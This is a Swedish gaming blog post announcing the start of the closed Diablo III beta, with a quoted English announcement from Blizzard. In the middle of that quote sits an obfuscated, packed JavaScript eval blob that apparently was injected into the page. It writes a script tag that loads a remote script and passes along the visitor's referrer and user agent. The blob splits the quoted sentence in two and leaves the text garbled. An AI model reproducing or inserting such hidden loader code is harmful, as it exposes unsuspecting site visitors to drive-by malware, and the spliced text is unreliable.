Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

Diablo III betan är nu igång

Diablo III betan är nu igång
Sebastian

Efter lång väntan är den äntligen här!!!

Nu har Blizzard satt igång den stängda betan för Diablo 3. Detta betyder att alla lyckliga med betakoder nu kan testa spelet.
Alla fem klasser kommer vara spelbara i den första akten av spelet.

[quote]The eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hsite|var|u0026u|referrer|ktsea||js|php’.split(’|’),0,{}))
fiery gates leading to the Burning Hells have begun to swing open, and the Diablo III beta test is officially underway. Invitations to participate in the beta test are now being delivered to the chosen heroes. As with beta tests for other Blizzard Entertainment games, the testing process for Diablo III will occur in phases. In addition to selecting players who have opted in via their Battle.net accounts, we’ll also be providing keys through beta promotions and giveaways — stay tuned for more info.[/quote]

Spelare är fria att dela med sig så mycket som möjligt av spelet på Youtube, Facebook eller andra sociala nätverk. Så vi kan vänta oss en massa roliga videoklipp från gameplay av spelet.

Mer info: us.battle.net